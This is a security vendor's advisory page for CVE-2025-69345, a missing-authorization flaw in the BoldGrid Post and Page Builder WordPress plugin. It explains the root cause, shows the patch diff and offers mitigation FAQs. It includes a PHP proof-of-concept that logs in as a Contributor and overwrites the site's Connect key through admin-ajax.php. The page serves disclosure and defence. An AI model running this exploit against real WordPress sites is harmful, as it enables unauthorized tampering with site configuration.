What is CVE-2025-69345?

CVE-2025-69345 is a medium severity vulnerability in the Post and Page Builder by BoldGrid plugin for WordPress. It is caused by a missing authorization check that allows authenticated users with Contributor-level access or higher to perform unauthorized administrative actions.

How does the vulnerability work?

The vulnerability exists in the AJAX handler function `save_key()` which lacks a capability check for user permissions. This allows attackers with valid Contributor accounts to send a specially crafted request to update the site’s Connect key, which should be restricted to administrators.

Who is affected by this vulnerability?

Any WordPress site using the Post and Page Builder plugin version 1.27.9 or earlier is affected. Specifically, users with Contributor-level access or higher can exploit this vulnerability to perform unauthorized actions.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Post and Page Builder plugin installed. If it is version 1.27.9 or earlier, your site is susceptible to CVE-2025-69345.

How can I fix this vulnerability?

To fix this vulnerability, update the Post and Page Builder plugin to version 1.27.10 or later, which includes the necessary authorization checks to prevent exploitation.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access or modification if exploited.

What is the principle of least privilege?

The principle of least privilege is a security concept that states users should only have the minimum level of access necessary to perform their tasks. This vulnerability violates this principle by allowing lower-privileged users to perform actions reserved for administrators.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates the vulnerability by showing how an authenticated Contributor can authenticate to a WordPress site and send a crafted AJAX request to exploit the missing authorization check, successfully modifying the Connect key.

What are the potential consequences of exploitation?

If exploited, an attacker could modify the Connect key used for API communications, potentially disrupting plugin functionality, unlinking the site from legitimate services, or associating it with a malicious account.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider temporarily disabling the Post and Page Builder plugin or restricting access to Contributor accounts to minimize the risk of exploitation until the update can be applied.

How can I stay informed about vulnerabilities?

To stay informed about vulnerabilities, regularly check the official WordPress plugin repository, subscribe to security mailing lists, and follow reputable security blogs and forums that cover WordPress security issues.

Is there a way to automate plugin updates for security?

Yes, you can enable automatic updates for plugins in WordPress by adding a filter in your theme’s functions.php file or using a plugin designed to manage updates. This helps ensure that security patches are applied promptly.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-69345: Post and Page Builder by BoldGrid <= 1.27.9 – Missing Authorization (post-and-page-builder)

CVE ID CVE-2025-69345

Plugin post-and-page-builder

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 1.27.9

Patched Version 1.27.10

Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69345:
This vulnerability is a missing authorization flaw in the Post and Page Builder by BoldGrid WordPress plugin. The vulnerability affects the plugin’s AJAX handler for saving a Connect key. The flaw allows authenticated users with Contributor-level permissions or higher to perform an administrative action, violating the principle of least privilege. The CVSS score of 4.3 reflects a medium severity impact.

The root cause is the absence of a capability check in the `save_key()` function within the file `/post-and-page-builder/includes/class-boldgrid-editor-ajax.php`. Before the patch, the function only validated a nonce via `self::validate_nonce(‘gridblock_save’)`. It then directly processed the `$_POST[‘connectKey’]` parameter. The function lacked any verification that the current user possesses the `manage_options` capability, which is required for performing site-wide configuration changes.

Exploitation requires an attacker to have a valid WordPress account with at least Contributor-level access. The attacker crafts a POST request to the standard WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The request must include the `action` parameter set to `boldgrid_editor_save_key` to trigger the vulnerable function. The payload must also include a valid nonce (obtainable by a Contributor) and the `connectKey` parameter containing the key to be saved. The nonce check passes, but the missing capability check allows the unauthorized update.

The patch adds an authorization check at the beginning of the `save_key()` function. The code now verifies `if ( ! current_user_can( ‘manage_options’ ) )`. If the check fails, the function sets an HTTP 403 status and returns a JSON error, terminating execution. This change ensures only users with administrator privileges can execute the function. The plugin version number in the main file was also incremented from 1.27.9 to 1.27.10.

Successful exploitation allows a lower-privileged user to modify the plugin’s Connect key. This key is likely used for API communication or licensing with BoldGrid services. An attacker could disrupt plugin functionality, unlink the site from a legitimate BoldGrid account, or potentially associate it with a malicious account. This constitutes unauthorized modification of site configuration.

Differential between vulnerable and patched code

Code Diff

--- a/post-and-page-builder/includes/class-boldgrid-editor-ajax.php
+++ b/post-and-page-builder/includes/class-boldgrid-editor-ajax.php
@@ -233,6 +233,12 @@
 	public function save_key() {
 		self::validate_nonce( 'gridblock_save' );

+		// Require administrator privileges to update site-wide Connect key.
+		if ( ! current_user_can( 'manage_options' ) ) {
+			status_header( 403 );
+			wp_send_json_error();
+		}
+
 		$connectKey = ! empty( $_POST['connectKey'] ) ? sanitize_text_field( $_POST['connectKey'] ) : null;
 		$connectKey = false === strpos( $connectKey, '-' ) ? $connectKey : md5( $connectKey );

--- a/post-and-page-builder/post-and-page-builder.php
+++ b/post-and-page-builder/post-and-page-builder.php
@@ -3,7 +3,7 @@
  * Plugin Name: Post and Page Builder
  * Plugin URI: https://www.boldgrid.com/boldgrid-editor/?utm_source=ppb-wp-repo&utm_medium=plugin-uri&utm_campaign=ppb
  * Description: Customized drag and drop editing for posts and pages. The Post and Page Builder adds functionality to the existing TinyMCE Editor to give you easier control over your content.
- * Version: 1.27.9
+ * Version: 1.27.10
  * Author: BoldGrid <support@boldgrid.com>
  * Author URI: https://www.boldgrid.com/?utm_source=ppb-wp-repo&utm_medium=author-uri&utm_campaign=ppb
  * Text Domain: boldgrid-editor

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69345 - Post and Page Builder by BoldGrid <= 1.27.9 - Missing Authorization
<?php
// Configure the target WordPress site URL.
$target_url = 'http://vulnerable-wordpress-site.local';

// Configure attacker credentials (Contributor or higher).
$username = 'contributor';
$password = 'password';

// Step 1: Authenticate to WordPress and obtain cookies and a nonce.
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Initialize a cURL handle for session persistence.
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Perform login.
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
$post_fields = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
$response = curl_exec($ch);

// Step 2: Visit the editor page to obtain a nonce for 'gridblock_save'.
// The nonce is typically exposed in page HTML or via a localized script.
// This example assumes a nonce is available in a script variable. A real exploit would parse it.
$editor_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $editor_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

// Extract nonce (placeholder - actual implementation requires parsing HTML/JS).
// For this PoC, we assume the attacker has obtained a valid nonce.
$nonce = 'EXTRACTED_NONCE_VALUE';

// Step 3: Exploit the missing authorization to save a new Connect key.
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
$exploit_payload = [
    'action' => 'boldgrid_editor_save_key', // The AJAX hook for the vulnerable function.
    'connectKey' => 'malicious-key-12345', // The key to be saved.
    '_wpnonce' => $nonce // The nonce for 'gridblock_save' action.
];
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_payload));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

echo "HTTP Response Code: $http_coden";
echo "Response Body: $responsen";

// A successful exploitation on a vulnerable version will return a JSON success response.
// A patched version will return a 403 error.

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-69345?
Overview of the vulnerability
CVE-2025-69345 is a medium severity vulnerability in the Post and Page Builder by BoldGrid plugin for WordPress. It is caused by a missing authorization check that allows authenticated users with Contributor-level access or higher to perform unauthorized administrative actions.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability exists in the AJAX handler function `save_key()` which lacks a capability check for user permissions. This allows attackers with valid Contributor accounts to send a specially crafted request to update the site’s Connect key, which should be restricted to administrators.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Post and Page Builder plugin version 1.27.9 or earlier is affected. Specifically, users with Contributor-level access or higher can exploit this vulnerability to perform unauthorized actions.
How can I check if my site is vulnerable?
Identifying vulnerable versions
To check if your site is vulnerable, verify the version of the Post and Page Builder plugin installed. If it is version 1.27.9 or earlier, your site is susceptible to CVE-2025-69345.
How can I fix this vulnerability?
Steps to mitigate the issue
To fix this vulnerability, update the Post and Page Builder plugin to version 1.27.10 or later, which includes the necessary authorization checks to prevent exploitation.
What does the CVSS score of 4.3 indicate?
Understanding risk levels
The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access or modification if exploited.
What is the principle of least privilege?
Importance in security
The principle of least privilege is a security concept that states users should only have the minimum level of access necessary to perform their tasks. This vulnerability violates this principle by allowing lower-privileged users to perform actions reserved for administrators.
How does the proof of concept demonstrate the issue?
Illustrating the exploit
The proof of concept illustrates the vulnerability by showing how an authenticated Contributor can authenticate to a WordPress site and send a crafted AJAX request to exploit the missing authorization check, successfully modifying the Connect key.
What are the potential consequences of exploitation?
Impact on site security
If exploited, an attacker could modify the Connect key used for API communications, potentially disrupting plugin functionality, unlinking the site from legitimate services, or associating it with a malicious account.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin immediately, consider temporarily disabling the Post and Page Builder plugin or restricting access to Contributor accounts to minimize the risk of exploitation until the update can be applied.
How can I stay informed about vulnerabilities?
Keeping up with security updates
To stay informed about vulnerabilities, regularly check the official WordPress plugin repository, subscribe to security mailing lists, and follow reputable security blogs and forums that cover WordPress security issues.
Is there a way to automate plugin updates for security?
Enhancing site security
Yes, you can enable automatic updates for plugins in WordPress by adding a filter in your theme’s functions.php file or using a plugin designed to manage updates. This helps ensure that security patches are applied promptly.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations